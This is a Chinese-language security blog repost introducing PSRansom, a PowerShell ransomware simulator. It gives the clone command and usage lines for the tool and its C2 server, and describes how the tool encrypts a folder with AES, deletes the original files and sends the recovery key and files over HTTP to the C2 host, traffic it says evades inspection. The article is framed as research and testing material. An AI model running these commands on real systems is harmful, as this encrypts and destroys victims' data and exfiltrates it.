如何使用PSRansom进行勒索软件安全分析

admin 2022年4月1日11:10:09安全闲碎评论18 views1077字阅读3分35秒阅读模式

如何使用PSRansom进行勒索软件安全分析

 关于PSRansom 

PSRansom是一款带有C2服务器功能的PowerShell勒索软件模拟工具,该工具可以帮助广大研究人员模拟针对任何操作系统平台(只要安装了PowerShell即可)的通用勒索软件数据加密过程。在C2服务器功能的帮助下,我们甚至还可以通过HTTP从目标设备(客户端)中提取文件,并在服务器端接收信息。

客户端和服务器端之间的通信数据都经过了加密和编码,因此是无法被基于流量审计的检查工具所检测到的。

 工具要求 

PowerShell 4.0或更高版本

 工具下载 

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/JoelGMSec/PSRansom
或者直接访问该项目的【Releases页面】下载工具的压缩文件。

下载完成之后,我们将拿到两个脚本:PSRansom和C2Server。第一个将模拟勒索软件感染,而第二个将负责恢复文件及其恢复密钥。

 工具使用 

该工具的使用非常简单,我们只需要指明要加密的目录、C2 服务器的 IP 或主机名以及接收连接的端口。

除此之外,如果我们需要发送加密文件,则需要在命令结尾添加-x参数选项即可。在解密的时候,只需要指明目录和恢复密钥即可。

如何使用PSRansom进行勒索软件安全分析

 工具使用样例 

首先,我们的测试场景定义如下:

1、勒索软件将在 Windows 机器上运行

2、我们要加密的文件夹位于 C:Backup

3、C2 服务器将在 Kali Linux 上运行

4、所有流量都将通过代理查看详细信息

接下来,我们看看该工具提供了哪些操作选项:

如何使用PSRansom进行勒索软件安全分析

命令和控制服务器的使用也非常简单,我们只需要指明监听连接的端口和接收连接的端口即可。这里,我们使用的是80端口:

pwsh C2Server.ps1 + 80

如何使用PSRansom进行勒索软件安全分析

接下来,我们将使用以下命令运行加密和渗透:

.PSRansom.ps1 -e directory -s ServerC2 -p port -x
如何使用PSRansom进行勒索软件安全分析

此时将生成24 个字母数字字符(小写、大写和数字)的随机密钥,数据将以 AES256 加密,并将恢复密钥发送到 C2 服务器。

完成后,原始文件将被删除,仅保留加密的文件:

如何使用PSRansom进行勒索软件安全分析

服务器端将接收到类似如下图所示的内容:

如何使用PSRansom进行勒索软件安全分析

现在,我们将在服务器端接收到目标设备的信息、恢复密钥、加密文件列表等:

如何使用PSRansom进行勒索软件安全分析

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可证协议。

参考资料

https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell

如何使用PSRansom进行勒索软件安全分析



精彩推荐






如何使用PSRansom进行勒索软件安全分析

如何使用PSRansom进行勒索软件安全分析
如何使用PSRansom进行勒索软件安全分析
如何使用PSRansom进行勒索软件安全分析

原文始发于微信公众号(FreeBuf):如何使用PSRansom进行勒索软件安全分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月1日11:10:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  如何使用PSRansom进行勒索软件安全分析 https://cn-sec.com/archives/858175.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: